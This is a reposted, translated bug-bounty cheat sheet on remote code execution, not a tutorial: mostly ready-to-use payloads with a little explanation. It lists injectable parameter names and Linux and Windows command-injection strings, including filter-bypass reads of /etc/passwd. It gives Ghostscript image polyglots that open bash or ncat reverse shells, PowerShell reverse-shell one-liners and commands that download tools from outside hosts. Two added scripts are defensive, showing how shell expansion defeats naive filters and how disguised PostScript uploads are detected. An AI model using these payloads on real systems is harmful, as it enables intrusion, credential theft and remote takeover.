Practical notes: a summary of payloads commonly used for RCE in vulnerability hunting
RCE: remote code execution (RCE) lets an attacker run malicious code through an injection attack. Code injection is not the same as command injection: in code injection the attacker's input is evaluated by the application's own interpreter (PHP, Python, Node.js and so on), so what the attacker can do is bounded by what that interpreter allows; in command injection the input reaches an OS shell. In some cases an attacker can escalate from code injection to command injection, for example by calling the language's own system()/exec() functions from the injected code. Remote code evaluation can lead to full compromise of the vulnerable web application and of the web server. Note that almost every programming language has a code-evaluation feature.
How to find RCE:
Top 46 RCE parameters (parameter names that most often end up in an eval() or a shell command; replace {payload} with one of the payloads below, one parameter per line):
exec={payload}
command={payload}
execute={payload}
ping={payload}
include={payload}
exclude={payload}
jump={payload}
code={payload}
reg={payload}
do={payload}
func={payload}
arg={payload}
option={payload}
load={payload}
process={payload}
step={payload}
read={payload}
function={payload}
req={payload}
feature={payload}
exe={payload}
module={payload}
payload={payload}
run={payload}
print={payload}
email={payload}
id={payload}
username={payload}
user={payload}
to={payload}
from={payload}
search={payload}
query={payload}
q={payload}
s={payload}
shopId={payload}
blogId={payload}
phone={payload}
mode={payload}
next={payload}
firstname={payload}
lastname={payload}
locale={payload}
cmd={payload}
sys={payload}
system={payload}
Linux RCE
Payload list, one per line. The first group wraps a harmless `id` in the command separators and quoting an injected string might land inside of (`;`, `|`, `||`, `&`, `&&`, backticks, `$()`), which is the quickest way to find out which separator the vulnerable sink honours:
id
,id
;id
;id;
'id'
"id"
""id
""id""
""id""&
*id
*id*
**id**
(id)
`id`
`id`&
`id` &
;id|
;|id|
|id
|id|
||id
||id|
||id;
|id;
&id
&id&
&&id
&&id&&
^id
Code-injection payloads (PHP), for sinks that evaluate code rather than a shell command:
system("cat /etc/passwd");
<?php system("cat /etc/passwd");?>
php -r 'var_dump(exec("id"));'
(sy.(st).em)(whoami);
Filter/WAF-bypass variants of `cat /etc/passwd`:
/bin$u/bash$u
cat$u+/etc$u/passwd$u
";cat+/etc/passwd+#
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
;+cat+/e"tc/pass"wd
cat+/etc/passwd
cat /etc$u/passwd
;cat+/etc/passwd
;cat+/etc/passwd+#
;cat$u+/etc$u/passwd$u
;cat%20/etc/passwd
;cat /e${hahaha}tc/${heywaf}pas${catchthis}swd
;cat$u /etc$u/passwd$u
;{cat,/etc/passwd}
;cat /dev/tcp/yourip/yourport 0<&1 2>&1"
Why these get through: `$u`, `${hahaha}` and the other names are unset variables that expand to nothing, so `cat$u` is just `cat` by the time the shell runs it; `/e"tc/pass"wd` becomes `/etc/passwd` after quote removal; `{cat,/etc/passwd}` is brace expansion, which produces `cat /etc/passwd` without a space ever appearing in the request; `/???/??t` and `/?in/cat` are globs that resolve to `/bin/cat` (check the expansion, a glob can match more than one path); `+` and `%20` are URL-encoded spaces; a trailing `#` comments out whatever the application appends after the injection point. A signature-based filter only ever sees the raw bytes, the shell sees the expanded result.
MVG/SVG upload fragments (`pop graphic-context` is ImageMagick MVG syntax; the page carries only these lines):
pop graphic-context
pop graphic-context
Save as poc.xml:
<?xml version="1.0" standalone="no"?>
GhostScript RCE
Listener: nc -nvlp 1337
Save as test.gif or test.jpg (the content is PostScript whatever the extension says; the decoder is selected by magic bytes, not by the file name):
1. %!PS userdict /setpagedevice undef legal { null restore } stopped { pop } if legal mark /OutputFile (%pipe%bash -c "bash -i >& /dev/tcp/yourip/yourport 0>&1") currentdevice putdeviceprops
2. %!PS 0 1 300367 {} for {save restore} stopped {} if (%pipe%bash -c "bash -i >& /dev/tcp/yourip/yourport 0>&1") (w) file
3. %!PS userdict /setpagedevice undef save legal { null restore } stopped { pop } if { legal } stopped { pop } if restore mark /OutputFile (%pipe%bash -c "bash -i >& /dev/tcp/yourip/yourport 0>&1") currentdevice putdeviceprops
4. %!PS userdict /setpagedevice undef legal { null restore } stopped { pop } if legal mark /OutputFile (%pipe%curl http://inputburpcollaborator) currentdevice putdeviceprops
5. (variant of 3 using ncat instead of a bash reverse shell) %!PS userdict /setpagedevice undef save legal { null restore } stopped { pop } if { legal } stopped { pop } if restore mark /OutputFile (%pipe%ncat yourip yourport -e /bin/sh) currentdevice putdeviceprops
Save as poc.pdf:
%!PS currentdevice null true mark /OutputICCProfile (%pipe%curl http://inputburpcollaborator) .putdeviceparams quit
Replace yourip/yourport with your listener and inputburpcollaborator with a Collaborator or other out-of-band host. Start with the curl variants: a DNS/HTTP callback proves execution without needing a shell back, and is the least noisy way to confirm the bug. `%pipe%` is the Ghostscript device that runs an OS command; the `setpagedevice undef` / `null restore` prologue is what escapes the -dSAFER sandbox, and these payloads only work on unpatched Ghostscript builds.
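The following script is an added example and is not code from the original article. It shows why the `$u`, `${var}`, quote and brace-expansion payloads in the Linux list above get past a naive blacklist WAF: the filter inspects the raw payload, while the shell on the target sees it only after expansion, and that expanded argv is what runs. The blacklist signature and the function names (`naive_filter`, `expanded_words`, `bypasses_filter`) are assumptions made for this example; bash is assumed on the target side, since brace expansion is a bash feature.

```shell
#!/usr/bin/env bash
# Added example, not from the original article: raw payload as a signature WAF
# sees it versus the argv the shell actually hands to the program.
# Assumptions: the blacklist below is a made-up signature; bash on the target.

# naive_filter: stand-in for a signature WAF. Returns 0 (block) when the raw
# payload contains the literal command, 1 (allow) otherwise.
naive_filter() {
  case "$1" in
    *"cat /etc/passwd"*) return 0 ;;
    *) return 1 ;;
  esac
}

# expanded_words: the argument words the shell would hand to a program after
# variable, quote, brace and glob expansion, one per line. printf stands in
# for the real program so nothing is read; u, hahaha, heywaf, catchthis are
# unset so they expand to the empty string exactly as in the payloads. Runs in
# a separate bash so this works even when the script itself is run by /bin/sh.
expanded_words() {
  "${BASH:-bash}" -c "unset u hahaha heywaf catchthis; printf '%s\n' $1"
}

# bypasses_filter: 0 when the payload is allowed by the filter yet expands to
# the very same argv as the blocked command "cat /etc/passwd".
bypasses_filter() {
  local want got
  want=$(expanded_words 'cat /etc/passwd')
  got=$(expanded_words "$1")
  ! naive_filter "$1" && [ "$got" = "$want" ]
}

# Demo: WAF verdict and post-expansion argv for payloads taken from the list
# above. The glob payload on the last line depends on the local filesystem.
for p in 'cat /etc/passwd' 'cat$u /etc$u/passwd$u' '{cat,/etc/passwd}' \
         'cat /e"tc/pass"wd' 'cat /e${hahaha}tc/${heywaf}pas${catchthis}swd' \
         '/???/??t /???/??ss??'; do
  if naive_filter "$p"; then verdict=BLOCKED; else verdict=allowed; fi
  printf 'raw: %-48s  WAF: %-7s  shell argv: ' "$p" "$verdict"
  expanded_words "$p" | tr '\n' ' '
  echo
done
```

The defensive lesson is the same as the offensive one: do not validate the raw string and then hand it to a shell. Pass arguments to the program directly (execve-style APIs, no shell) so no expansion step sits between the check and the execution.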
The GitHub project below is the best fit for finding RCE bugs in upload functionality:
https://github.com/modzero/mod0BurpUploadScanner.git
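The script below is an added example; it is not from the original article and is not part of the mod0BurpUploadScanner project. It is the check that catches the Ghostscript polyglots from the previous section: those files are plain PostScript saved with an image extension, so an upload handler (or a hunter checking how a target filters uploads) can reject them by comparing the magic bytes with the claimed extension and by looking for the PostScript constructs the payloads rely on. The function names (`magic_type`, `suspicious_upload`, `make_samples`) and the sample files are constructed for this example, the samples being built from the page's own payloads; it needs only POSIX `head`, `od` and `grep`.

```shell
#!/usr/bin/env bash
# Added example, not from the original article or the linked scanner: reject
# PostScript masquerading as an image, the pattern used by the Ghostscript
# payloads above. Function names and sample files are constructed here.

# magic_type: classify a file from its first four bytes, ignoring the extension.
magic_type() {
  case "$(head -c 4 "$1" | od -An -tx1 | tr -d ' \n')" in
    25215053) echo postscript ;;   # "%!PS"
    47494638) echo gif ;;          # "GIF8" (GIF87a / GIF89a)
    25504446) echo pdf ;;          # "%PDF"
    ffd8ff*)  echo jpeg ;;         # JPEG SOI marker
    *)        echo unknown ;;
  esac
}

# suspicious_upload: return 0 (reject) with a reason on stdout when the content
# type disagrees with the extension, or when the file carries the indicators
# the payloads use: %pipe% (the device that runs an OS command), /OutputFile
# and /OutputICCProfile (the parameters the command is smuggled through) and
# "setpagedevice undef" (the -dSAFER bypass prologue). Returns 1 otherwise.
suspicious_upload() {
  local f ext type
  f=$1
  ext=${f##*.}
  type=$(magic_type "$f")
  case "$ext:$type" in
    gif:gif|jpg:jpeg|jpeg:jpeg|pdf:pdf) ;;
    *) echo "$f: content is $type but extension is .$ext"; return 0 ;;
  esac
  if grep -q -E '%pipe%|/OutputFile|/OutputICCProfile|setpagedevice undef' "$f"; then
    echo "$f: Ghostscript exploit indicators present"; return 0
  fi
  return 1
}

# make_samples: write constructed samples into directory $1: payload 4 from the
# list above saved as test.gif, the poc.pdf payload, and a GIF header only.
make_samples() {
  printf '%%!PS\nuserdict /setpagedevice undef\nlegal { null restore } stopped { pop } if\nlegal\nmark /OutputFile (%%pipe%%curl http://inputburpcollaborator) currentdevice putdeviceprops\n' > "$1/test.gif"
  printf '%%!PS\ncurrentdevice null true mark /OutputICCProfile (%%pipe%%curl http://inputburpcollaborator) .putdeviceparams\nquit\n' > "$1/poc.pdf"
  printf 'GIF89a;' > "$1/real.gif"
}

# Demo on the constructed samples: one verdict line per file.
demo_dir=$(mktemp -d)
make_samples "$demo_dir"
for f in "$demo_dir"/test.gif "$demo_dir"/poc.pdf "$demo_dir"/real.gif; do
  suspicious_upload "$f" || echo "$f: ok ($(magic_type "$f"))"
done
rm -rf "$demo_dir"
```

The magic-byte comparison is the part that matters: the exploit works precisely because image libraries dispatch on content, not on the extension, so a filter that only checks the extension or the Content-Type header sees a valid .gif while Ghostscript sees PostScript.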
PHPGGC: PHP Generic Gadget Chains
This tool lets you generate payloads without the tedious work of finding gadgets and chaining them yourself. It can be seen as the PHP equivalent of frohoff's ysoserial. Gadget chains currently supported by the tool include: CodeIgniter4, Doctrine, Drupal7, Guzzle, Laravel, Magento, Monolog, Phalcon, Podio, Slim, SwiftMailer, Symfony, WordPress, Yii and ZendFramework.
This is the best fit for finding RCE bugs in frameworks/libraries (via insecure PHP deserialization, i.e. user-controlled data reaching unserialize()):
https://github.com/ambionics/phpggc
Windows RCE
Payload list, one per line (the first groups break out of a single- or double-quoted string, then chain `dir`; the `phpinfo()` group targets PHP code evaluation rather than a shell):
".system("dir")."
' dir
' || dir
' & dir
' && dir
'; dir
" dir
" || dir
" | dir
" & dir
" && dir
"; dir
dir
$(`dir`)
&&dir
| dir C:\
; dir C:\
& dir C:\
&& dir C:\
dir C:\
| dir
; dir
& dir
&& dir
| ipconfig /all
; ipconfig /all
& ipconfig /all
&& ipconfig /all
ipconfig /all
|| phpinfo()
| phpinfo()
{${phpinfo()}}
;phpinfo()
;phpinfo();//
";phpinfo();//
& phpinfo()
&& phpinfo()
phpinfo()
phpinfo();
RCE payloads for when all dangerous characters are escaped (percent-encoded and `+`-encoded variants of the above, including double-encoded backslashes such as %255c):
%27%20dir
%27%20%7C%7C%20dir
%27%20%26%20dir
%27%20%26%26%20dir
%27%3B%20dir
%22%20dir
%22%20%7C%7C%20dir
%22%20%7C%20dir
%22%20%26%20dir
%22%20%26%26%20dir
%22%3B%20dir
%22.system%28%27dir%27%29.%22
%24%28%60dir%60%29
%26%26dir
%7C%20dir%20C%3A%5C
%3B%20dir%20C%3A%5C
%26%20dir%20C%3A%5C
%26%26%20dir%20C%3A%5C
dir%20C%3A%5C
%7C%20dir
%3B%20dir
%26%20dir
%26%26%20dir
+dir+c:+|
+|+dir+c:+|
+|+dir+c:%2f+|
dir+c:
||+dir|c:
+|+Dir+c:
+|+Dir+c:%255c
+|+Dir+c:%2f
$+|+Dir+c:
$+|+Dir+c:%255c
$+|+Dir+c:%2f
%26%26+|+dir c:
%0a+dir+c:
%26%26+|+dir c:%2f
$%26%26dir+c:%2f
%0a+dir+c:%2f
%0a+dir+c:%255c
$%26%26dir c:
%26%26+|+dir c:%255c
$%26%26dir+c:%255c
%20{${phpinfo()}}
Reverse shell:
Listener: nc -nvlp 443
PowerShell one-liner (plain TCP reverse shell; every received line is run through iex and the output sent back):
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('your ip',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
or the hidden-window variant, which runs commands through %ComSpec% /c (cmd.exe semantics) unless they are in its small built-in list or PowerShell mode has been switched on by sending $ps:
powershell -NoP -NonI -W Hidden -Exec Bypass "& {$ps=$false;$hostip='your ip';$port=443;$client = New-Object System.Net.Sockets.TCPClient($hostip,$port);$stream = $client.GetStream();[byte[]]$bytes = 0..50000|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$cmd=(get-childitem Env:ComSpec).value;$inArray=$data.split();$item=$inArray[0];if(($item -eq '$ps') -and ($ps -eq $false)){$ps=$true}if($item -like '?:'){$item='d:'}$myArray=@('cd','exit','d:','pwd','ls','ps','rm','cp','mv','cat');$do=$false;foreach ($i in $myArray){if($item -eq $i){$do=$true}}if($do -or $ps){$sendback=( iex $data 2>&1 |Out-String)}else{$data2='/c '+$data;$sendback = ( &$cmd $data2 2>&1 | Out-String)};if($ps){$prompt='PS ' + (pwd).Path}else{$prompt=(pwd).Path}$sendback2 = $data + $sendback + $prompt + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()}"
The strings inside both one-liners use single quotes so they survive the outer double quotes when launched from cmd.exe; if a payload needs double quotes inside, pass it as -EncodedCommand (base64 of the UTF-16LE script) instead of -c. Both are plain TCP, so the whole session crosses the wire in clear text.
Reverse shell generator: https://www.revshells.com
File download:
powershell -c "(new-object System.Net.WebClient).DownloadFile('https://eternallybored.org/misc/wget/1.21.1/64/wget.exe','C:\Users\admin\Desktop\wget.exe')"
powershell iwr -uri http://10.10.16.97:8000/chisel.exe -outfile ch.exe   # also works in PowerShell ConstrainedLanguageMode
Best Burp Suite extension for RCE (Unix and Windows):
https://github.com/ewilded/shelling
Best command-injection exploitation tool:
https://github.com/commixproject/commix
Happy Hacking!
Reposted from HACK学习呀.
Original source:
https://ansar0047.medium.com/remote-code-execution-unix-and-windows-4ed3367158b3